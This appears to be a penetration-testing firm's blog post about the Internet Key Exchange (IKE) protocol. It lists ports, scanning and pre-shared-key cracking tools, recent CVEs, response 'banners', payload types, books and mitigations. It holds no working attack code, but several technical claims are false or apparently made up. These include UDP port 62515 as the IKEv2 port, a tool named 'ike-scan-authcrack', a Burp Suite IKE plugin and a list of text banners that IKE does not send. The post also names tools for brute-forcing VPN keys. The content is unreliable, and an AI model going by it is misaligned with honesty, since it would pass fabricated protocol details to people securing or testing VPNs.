05 Apr, 2023

The Internet Key Exchange (IKE)

Penetration Testing as a service (PTaaS)

Tests security measures and simulates attacks to identify weaknesses.

The Internet Key Exchange (IKE) protocol is a key management protocol used to establish and maintain secure VPN tunnels. IKE is often used in combination with the IPsec protocol, which provides encryption and authentication of data packets.
IKE is used to negotiate the encryption and authentication algorithms to be used in the VPN tunnel, as well as to exchange keys and establish a secure communication channel between the two endpoints. IKE provides a secure method for the exchange of secret keys, which are used to encrypt and decrypt data exchanged between the two endpoints.

IKE common ports

UDP port 500 – This is the most commonly used port for IKE. It’s used for both the initial handshake and for exchanging encrypted data between devices.

UDP port 4500 – This port is used for IKE over NAT (Network Address Translation) and is often used in situations where the VPN client and server are behind NAT devices.

TCP port 10000 – Some VPN implementations use TCP instead of UDP for IKE communication, and TCP port 10000 is a common port used for this purpose.

UDP port 1701 – This port is used specifically for L2TP (Layer 2 Tunneling Protocol) over IPsec VPNs, which use IKE for authentication and key exchange.

UDP port 62515 – This port is used for IKEv2 (Internet Key Exchange version 2), which is a newer version of IKE that’s becoming increasingly popular due to its improved security features.

Standard commands from unauthorized users

It is important to note that unauthorized users should not be attempting to interact with the IKE protocol. Any attempts to do so could be illegal and can result in serious consequences. However, for informational purposes, here are some of the standard commands that could potentially be used by unauthorized users to interact with the IKE protocol:

ike-scan – This is a command-line tool that can be used to scan a network for devices that are running IKE. It can also be used to send IKE packets to these devices to test for vulnerabilities.

ike-scan-authcrack – This is a tool that can be used to test the strength of IKE authentication credentials. It uses a dictionary attack to try different usernames and passwords in an attempt to gain access to the VPN.

ikecrack – This is a tool that can be used to crack pre-shared keys (PSKs) used by IKE. It uses a brute-force attack to try different combinations of characters until it finds the correct key.

IKEProbe – This is a tool that can be used to send IKE packets to a device to test for vulnerabilities. It can also be used to send malformed packets to test how the device handles them.

Manual Tools:

  • Wireshark – A popular network protocol analyzer that can capture and analyze network traffic, including IKE packets. It allows you to see detailed information about each packet and can help you identify any issues with your IKE implementation.

  • IKEProbe – A command-line tool that can send IKE packets to test for vulnerabilities. It can also send malformed packets to test how the device handles them.

  • IKEView – A GUI-based tool that can decode and display IKE packets. It can also display the status of active VPN tunnels.

  • ike-scan – A tool that can be used to scan a network for devices that are running IKE. It can also send IKE packets to these devices to test for vulnerabilities.

  • StrongSwan – An open-source IPsec-based VPN solution that includes a built-in IKEv2 client and server. It can be used for testing IKE implementations.

  • OpenIKEv2 – An open-source implementation of the IKEv2 protocol. It can be used for testing IKEv2 implementations.

  • racoon – An open-source implementation of the IKE protocol for IPsec-based VPNs. It can be used for testing IKE implementations.

  • v2tester – A tool that can be used to test IKEv2 implementations. It can simulate different types of clients and servers to test how IKEv2 handles different scenarios.

  • IKECrack – A tool that can be used to crack pre-shared keys (PSKs) used by IKE. It uses a brute-force attack to try different combinations of characters until it finds the correct key.

  • ike-scan-authcrack – A tool that can be used to test the strength of IKE authentication credentials. It uses a dictionary attack to try different usernames and passwords in an attempt to gain access to the VPN.

Automated Tools:

  • Nmap – A popular network scanner that includes a script for scanning for devices running IKE. The script can identify devices running IKEv1, IKEv2, and Hybrid IKE.

  • Nessus – A vulnerability scanner that includes checks for IKE vulnerabilities. It can identify devices running vulnerable versions of IKE and can provide recommendations for remediation.

  • Metasploit – A penetration testing framework that includes modules for testing IKE vulnerabilities. It can be used to exploit vulnerabilities in IKE implementations.

  • ExploitDB – A database of exploits and vulnerabilities, including IKE vulnerabilities. It can be used to identify known vulnerabilities in IKE implementations.

  • Snort – An open-source intrusion detection and prevention system that includes rules for detecting IKE-related attacks. It can be used to identify suspicious traffic related to IKE.

  • Suricata – An open-source intrusion detection and prevention system that includes rules for detecting IKE-related attacks. It can be used to identify suspicious traffic related to IKE.

  • Security Onion – A Linux distribution for network security monitoring that includes several tools for monitoring IKE traffic, including Wireshark, Snort, and Suricata.

  • Qualys – A vulnerability management platform that includes checks for IKE vulnerabilities. It can identify devices running vulnerable versions of IKE and can provide recommendations for remediation.

  • Shodan – A search engine for internet-connected devices that can be used to identify devices running IKE. It can be used to find vulnerable devices and test their IKE implementations.

  • Burp Suite – A web application security testing tool that includes a plugin for testing IKE implementations. The plugin can be used to send IKE packets and analyze the responses to identify vulnerabilities.

Last five known CVE for IKE

• CVE-2023-24859 – Windows Internet Key Exchange (IKE) Extension Denial of Service Vulnerability 

CVE-2023-22404 – An Out-of-bounds Write vulnerability in the Internet Key Exchange Protocol daemon (iked) of Juniper Networks Junos OS on SRX series and MX with SPC3 allows an authenticated, network-based attacker to cause a Denial of Service (DoS). iked will crash and restart, and the tunnel will not come up when a peer sends a specifically formatted payload during the negotiation. This will impact other IKE negotiations happening at the same time. Continued receipt of this specifically formatted payload will lead to continuous crashing of iked and thereby the inability for any IKE negotiations to take place. Note that this payload is only processed after the authentication has successfully completed. So the issue can only be exploited by an attacker who can successfully authenticate. This issue affects Juniper Networks Junos OS on SRX Series, and MX Series with SPC3: All versions prior to 19.3R3-S7; 19.4 versions prior to 19.4R3-S9; 20.2 versions prior to 20.2R3-S5; 20.3 versions prior to 20.3R3-S5; 20.4 versions prior to 20.4R3-S4; 21.1 versions prior to 21.1R3-S3; 21.2 versions prior to 21.2R3-S2; 21.3 versions prior to 21.3R3-S1; 21.4 versions prior to 21.4R2-S1, 21.4R3; 22.1 versions prior to 22.1R1-S2, 22.1R2.

• CVE-2023-21758 – Windows Internet Key Exchange (IKE) Extension Denial of Service Vulnerability. This CVE ID is unique from CVE-2023-21677, CVE-2023-21683.

• CVE-2023-21683 – Windows Internet Key Exchange (IKE) Extension Denial of Service Vulnerability. This CVE ID is unique from CVE-2023-21677, CVE-2023-21758.

• CVE-2023-21677 – Windows Internet Key Exchange (IKE) Extension Denial of Service Vulnerability. This CVE ID is unique from CVE-2023-21683, CVE-2023-21758.

Useful information

– IKE is a key exchange protocol used to establish secure connections between two devices over the internet.

– IKE is used in conjunction with IPsec, which provides encryption and authentication of IP packets.

– There are two versions of IKE: IKEv1 and IKEv2. IKEv1 is older and less secure, while IKEv2 is newer and more secure.

– IKEv2 supports a wider range of authentication methods than IKEv1, including certificate-based authentication and Extensible Authentication Protocol (EAP).

– IKEv2 is also designed to work better in mobile and remote access scenarios, where devices may have unstable network connections.

– IKE uses a combination of public-key and symmetric-key cryptography to establish a shared secret key between two devices.

– IKEv2 supports a feature called “Child SA rekeying,” which allows the devices to periodically renegotiate the encryption keys used for the IPsec connection.

– IKE packets can be vulnerable to attacks such as brute-force attacks, replay attacks, and man-in-the-middle attacks.

– IKE implementations can also be vulnerable to configuration errors or software bugs that can be exploited by attackers.

Known banners

“IKE responder ready” – This banner indicates that the IKE responder is ready to receive requests.

“IKEv1 responder ready” – This banner indicates that the IKEv1 responder is ready to receive requests.

“IKEv2 responder ready” – This banner indicates that the IKEv2 responder is ready to receive requests.

“IKEv1 Initialization Complete” – This banner indicates that the IKEv1 initialization process has completed successfully.

“IKEv2 Initialization Complete” – This banner indicates that the IKEv2 initialization process has completed successfully.

“no proposal chosen” – This banner indicates that the IKE proposal sent by the initiator was not accepted by the responder.

“invalid payload received” – This banner indicates that the responder received an invalid payload in the IKE packet.

“authentication failed” – This banner indicates that the authentication process for the IKE connection failed.

“IKE SA negotiation failed” – This banner indicates that the IKE SA negotiation process failed.

“IKE SA established” – This banner indicates that the IKE SA has been established successfully.

Books for studies The Internet Key Exchange (IKE) protocol

IKEv2 IPsec Virtual Private Networks: Understanding and Deploying IKEv2, IPsec VPNs, and FlexVPN in Cisco IOS by Graham Bartlett and Amjad Inamdar. This book provides a comprehensive introduction to IKEv2 and IPsec VPNs, with practical examples and configuration guides for deploying them in a Cisco IOS environment.

IKEv2: IPsec Virtual Private Network Fundamentals by Graham Bartlett and Amjad Inamdar. This book is a more in-depth exploration of IKEv2, with a focus on its architecture, configuration, and operation.

IPSec VPN Design by Vijay Bollapragada, Mohamed Khalid, and Scott Wainner. This book provides a comprehensive overview of IPSec VPNs, including the role of IKE in their operation and configuration.

Network Security Principles and Practices by Saadat Malik. This book covers a wide range of network security topics, including a detailed discussion of IKE and its role in securing VPNs.

Virtual Private Networks, Second Edition by Charlie Scott and Paul Wolfe. This book provides a comprehensive introduction to VPNs, including a discussion of IKE and other key protocols used in their operation.

List of Payload for The Internet Key Exchange (IKE) protocol

  • Nonce payload (Nx): The Nonce payload is used to prevent replay attacks by providing a unique value that is not repeated during the negotiation process. The Nonce value is typically generated by the initiator and is used to compute a shared secret key that is used for subsequent communications.

  • Identification payload (IDx): The Identification payload is used to identify the initiator or responder during the negotiation process. The ID payload can contain a variety of information, including IP addresses, domain names, or other identifying information.

  • Vendor ID payload (VID): The Vendor ID payload is used to identify the vendor or implementation of the IKE software being used. This information can be useful for troubleshooting or determining compatibility between different implementations of the protocol.

  • Certificate payload (CERT): The Certificate payload provides a mechanism for authentication by allowing the initiator to obtain a certificate from the responder. The certificate contains information about the public key used for encryption and can be used to verify the identity of the responder.

  • Authentication payload (AUTH): The Authentication payload verifies the identity of the communicating parties by using a shared secret key or digital signature. The AUTH payload is typically generated by the initiator and is used to authenticate the responder.

  • Security Association payload (SA): The Security Association payload specifies the parameters of the security association being established, including encryption and authentication algorithms, key lengths, and other security parameters.

  • Traffic Selector Initiator payload (TSi): The Traffic Selector Initiator payload specifies the traffic to be protected by the security association from the perspective of the initiator.

  • Traffic Selector Responder payload (TSr): The Traffic Selector Responder payload specifies the traffic to be protected by the security association from the perspective of the responder.

  • Notification payload (NOTIFY): The Notification payload is used to send error or status messages during the negotiation process. The NOTIFY payload can be used to indicate errors or problems with the negotiation process, or to provide status updates to the communicating parties.

Mitigation

  1. Limiting the number of IKE negotiation requests per unit of time from a single IP address to prevent flooding.

  2. Using firewalls and intrusion detection systems (IDS) to filter and block malicious traffic.

  3. Implementing rate limiting and throttling techniques to control the amount of traffic sent to the target, which can prevent resource exhaustion attacks.

  4. Deploying encrypted authentication mechanisms like certificates and pre-shared keys (PSKs) to prevent unauthorized access to the network.

  5. Using network address translation (NAT) to hide the internal IP address of the VPN gateway, which can prevent attackers from identifying the target.

Conclusion

Internet Key Exchange (IKE) protocol is an important component of secure communication over IP networks. It is used to establish security associations and negotiate key exchange between two parties, such as a VPN gateway and a remote client. The IKE protocol provides strong security mechanisms to ensure the confidentiality, integrity, and authenticity of the communication. However, like any security protocol, it is also vulnerable to attacks such as denial of service (DoS) attacks. To mitigate these vulnerabilities, network administrators can implement various strategies such as rate limiting, firewalls, and intrusion detection systems. Overall, the IKE protocol is a critical element of secure communication and its usage continues to grow as more organizations adopt VPN technologies for remote access and secure communication.

Other Services

Ready to secure?

Let's get in touch